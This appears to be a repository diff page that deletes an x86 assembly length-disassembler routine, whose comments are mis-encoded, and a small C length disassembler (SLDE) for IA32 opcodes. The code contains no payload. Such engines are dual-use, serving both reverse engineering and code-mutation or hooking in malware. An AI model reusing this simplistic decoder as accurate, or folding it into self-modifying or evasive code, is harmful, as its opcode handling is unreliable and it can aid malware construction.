;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND ¯®«ã票¥ SIBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG ä« £¨xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
_endmodrm_:
|
|
||||||
xor ebx,ebx
|
|
||||||
test cl,B_DATA8 ;¥áâì «¨ ®¤®¡ ©â®¢®¥ ᬥ饨¥?
|
|
||||||
je _nf1_
|
|
||||||
inc ebx
|
|
||||||
_nf1_:
|
|
||||||
test cl,B_DATA16 ;¥áâì «¨ ¤¢ãå¡ ©â®¢®¥ ᬥ饨¥?
|
|
||||||
je _nf2_
|
|
||||||
inc ebx
|
|
||||||
inc ebx
|
|
||||||
_nf2_:
|
|
||||||
test cl,B_PREFIX6X ;¥áâì «¨ ¢ ª®¬ ¤¥ ¥¯®á।á⢥®¥ § 票¥?
|
|
||||||
je _endflag_
|
|
||||||
dec dl ;¥áâì «¨ 0x66(0x67 ¤«ï [0xA0,0xA3]) ¢ à §¡¨à ¥¬®© ª®¬ ¤¥?
|
|
||||||
je _okp66_
|
|
||||||
inc ebx
|
|
||||||
inc ebx
|
|
||||||
_okp66_:
|
|
||||||
inc ebx
|
|
||||||
inc ebx
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND ä« £¨xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
_endflag_:
|
|
||||||
push ecx
|
|
||||||
push edi
|
|
||||||
mov ecx,ebp
|
|
||||||
add edi,12
|
|
||||||
rep movsb
|
|
||||||
sub edi,ebp
|
|
||||||
add edi,8
|
|
||||||
mov ecx,ebx
|
|
||||||
rep movsb
|
|
||||||
pop edi
|
|
||||||
pop dword ptr [edi+1]
|
|
||||||
sub esi,dword ptr [esp+4];eax
|
|
||||||
xchg esi,eax
|
|
||||||
mov byte ptr [edi+0],al
|
|
||||||
mov dword ptr [esp+7*4],eax ;á®åà 塞 à §¬¥à ¢ ¥ å
|
|
||||||
xchg ebp,eax
|
|
||||||
mov byte ptr [edi+7],al
|
|
||||||
mov byte ptr [edi+8],bl
|
|
||||||
popad
|
|
||||||
ret ;¢ë室¨¬:)
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;Š®¥æ äãªæ¨¨ _LiTo_ ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
|
|
||||||
|
|
||||||
SizeOfLiTo equ $-_LiTo_ ;à §¬¥à äãªæ¨¨ _LiTo_
|
|
@ -1,90 +0,0 @@
|
|||||||
|
|
||||||
/* yaav */
|
|
||||||
|
|
||||||
/* SLDE 0.1v */
|
|
||||||
/* This is simple lengh disassembler engine for IA32 x86 instruction set.The code is
|
|
||||||
Operation System independent. For now it supports only the most used one byte
|
|
||||||
opcodes(without few rarely used opcodes)but i will expand it in future :)
|
|
||||||
Credits goes to Benny- and Napalm. Thanks guys :) */
|
|
||||||
|
|
||||||
#define Prefix 5
|
|
||||||
#define ModRMy 1
|
|
||||||
#define ModRMn 0
|
|
||||||
#define Imm08 8
|
|
||||||
#define Imm32 32 /*16/32 bit Imm*/
|
|
||||||
#define ModRM 3 /*Unknown Opcode*/
|
|
||||||
|
|
||||||
unsigned char Array[] = "\x67\x66\x81\x05\x11\x11\x00\x00\x11\x11";
|
|
||||||
unsigned char ModRMTable[] = {
|
|
||||||
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /*00..07*/
|
|
||||||
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /* 08..0F*/
|
|
||||||
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /* 10..17 */
|
|
||||||
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn, /* 18..1F */
|
|
||||||
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 20..27 */
|
|
||||||
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 28..2F */
|
|
||||||
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 30..37 */
|
|
||||||
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm32,Prefix,ModRMn, /* 38..3F */
|
|
||||||
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 40..47 */
|
|
||||||
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 48..4F */
|
|
||||||
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 50..57 */
|
|
||||||
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 58..5F */
|
|
||||||
ModRMn,ModRMn,ModRMy,ModRMy,Prefix,Prefix,Prefix,Prefix, /* 60..67 */
|
|
||||||
ModRMn+Imm32,ModRMy+Imm32,ModRMn+Imm08,ModRMy+Imm08,ModRMn,ModRMn,ModRMn,ModRMn, /* 68..6F */
|
|
||||||
ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* 70..77 */
|
|
||||||
ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* 78..7F */
|
|
||||||
ModRMy+Imm08,ModRMy+Imm32,ModRMy+Imm08,ModRMy+Imm08,ModRMy,ModRMy,ModRMy,ModRMy, /* 80..87 */
|
|
||||||
ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy, /* 88..8F */
|
|
||||||
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /*90..97 */
|
|
||||||
ModRMn,ModRMn,ModRM/*9A Unknown */,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* 98..9F */
|
|
||||||
ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn,ModRMn,ModRMn,ModRMn, /* A0..A7 */
|
|
||||||
ModRMn+Imm08,ModRMn+Imm32,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn, /* A8..AF */
|
|
||||||
ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* B0..B7 */
|
|
||||||
ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32,ModRMn+Imm32, /* B8..BF */
|
|
||||||
ModRMy+Imm08,ModRMy+Imm08,ModRM /* RET WORD */,ModRMn,ModRMy,ModRMy,ModRMy+Imm08,ModRMy+Imm32, /* C0..C7 */
|
|
||||||
ModRM /* C8 Unknown */,ModRMn,ModRM /* RET WORD */,ModRMn,ModRMn,ModRMn+Imm08,ModRMn,ModRMn, /* C8..CF */
|
|
||||||
ModRMy,ModRMy,ModRMy,ModRMy,ModRMn+Imm08,ModRMn+Imm08,ModRMn,ModRMn, /* D0..D7 */
|
|
||||||
ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy,ModRMy, /* D8..DF */
|
|
||||||
ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08,ModRMn+Imm08, /* E0..E7 */
|
|
||||||
ModRMn+Imm32,ModRMn+Imm32,ModRM /*EA Unknown */,ModRMn+Imm08,ModRMn,ModRMn,ModRMn,ModRMn, /* E8..EF */
|
|
||||||
Prefix,ModRMn,Prefix,Prefix,ModRMn,ModRMn,ModRMy+Imm08,ModRMy+Imm32, /* F0..F7 */
|
|
||||||
ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMn,ModRMy,ModRMy /* F8..FF */
|
|
||||||
};
|
|
||||||
|
|
||||||
int main()
|
|
||||||
{
|
|
||||||
|
|
||||||
unsigned char *ptr,Mod;
|
|
||||||
ptr = Array;
|
|
||||||
int OperandSize = 4,OpcodeSize = 0,Displacement = 4;
|
|
||||||
|
|
||||||
DecodePrefixes:
|
|
||||||
|
|
||||||
if(ModRMTable[*ptr] == Prefix) {
|
|
||||||
if (*ptr == 0x66) { OpcodeSize += 1; OperandSize -= 2; } else { OpcodeSize += 1; }
|
|
||||||
ptr++;
|
|
||||||
goto DecodePrefixes;
|
|
||||||
}
|
|
||||||
|
|
||||||
OpcodeSize += 1; /* because of the opcode */
|
|
||||||
|
|
||||||
if (ModRMTable[*ptr] == Imm08+ModRMy || ModRMTable[*ptr] == Imm08 ) { OpcodeSize += 1; } /*is there a 8 bit Imm */
|
|
||||||
if (ModRMTable[*ptr] == Imm32+ModRMy || ModRMTable[*ptr] == Imm32 ) { OpcodeSize += OperandSize; } /* is there a 16 or 32 bit imm */
|
|
||||||
if (ModRMTable[*ptr] == ModRMy || ModRMTable[*ptr] == ModRMy+Imm08 || ModRMTable[*ptr] == ModRMy+Imm32) { /* is there a ModR/M Byte */
|
|
||||||
OpcodeSize += 1; ptr++; /*read the ModR/M Byte */ goto DecodeMod; }
|
|
||||||
else { printf ("The Opcode Size Is: %d\n",OpcodeSize); return 0; }
|
|
||||||
|
|
||||||
/*Decode ModR/M Byte */
|
|
||||||
DecodeMod:
|
|
||||||
Mod = *ptr;
|
|
||||||
if((Mod >= 0x00 && Mod <= 0x3F) || (Mod >= 0xC0 && Mod <= 0xFF)) { Displacement -= 4; }
|
|
||||||
if(Mod >= 0x40 && Mod <= 0x7F) { Displacement -= 3; }
|
|
||||||
OpcodeSize += Displacement;
|
|
||||||
|
|
||||||
if((Mod%0x10 == 4) || (Mod%0x10 == 0x0C)) { OpcodeSize += 1;} /* does it have SIB ? */
|
|
||||||
if(Mod <= 0x3D) { if((Mod%0x10 == 0x05) || (Mod%0x10 == 0x0D)){ OpcodeSize += 4; } }/* is it direct addresation? */
|
|
||||||
|
|
||||||
|
|
||||||
printf ("The Opcode Size Is: %d\n",OpcodeSize);
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Loading…
Reference in New Issue
Block a user